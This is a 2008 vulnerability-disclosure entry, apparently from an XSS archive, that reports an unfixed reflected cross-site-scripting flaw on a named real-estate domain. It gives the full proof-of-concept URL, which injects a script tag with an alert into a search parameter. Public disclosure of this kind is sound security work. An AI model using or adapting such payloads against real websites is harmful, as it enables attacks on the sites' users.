Security researcher PhysX, has submitted on 16/03/2008 a cross-site-scripting (XSS) vulnerability affecting hartford.2.homescape.com, which at the time of submission ranked 15868 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 26/05/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 16/03/2008 |
Date published: 26/05/2008 |
Fixed? Mail us! | Status: UNFIXED |
Author: PhysX |
Domain: hartford.2.homescape.com |
Category: XSS |
Pagerank: 15868 |
URL: http://hartford.2.homescape.com/SCS/search_api.jsp?geo_area_text=%3C/script%3E%3Cscript%3Ealert('XSS %20Vulnerability%20Tagged%20By%20PhysX');%3C/script%3E&geo_area_text_lookup_id=48605&filter_min_pric e=&filter_max_price=&filter_min_bed=&filter_min_bath=&filter_property_type=&search_by_type=resale_ml s%2Cresale_class%2Cresale%2Cnew_const%2Cnew_class%2Cnew_mls%2Cnew_ecom_agent%2Cnew_ecom_broker%2Cnew _ecom_builder%2Cnew_ecom_owner%2Cresale_ecom_agent%2Cresale_ecom_broker%2Cresale_ecom_builder%2Cresa le_ecom_owner&reporting_search_name=NC+Channel+Quick+Search+API |
Click here to view the mirror
|
|
|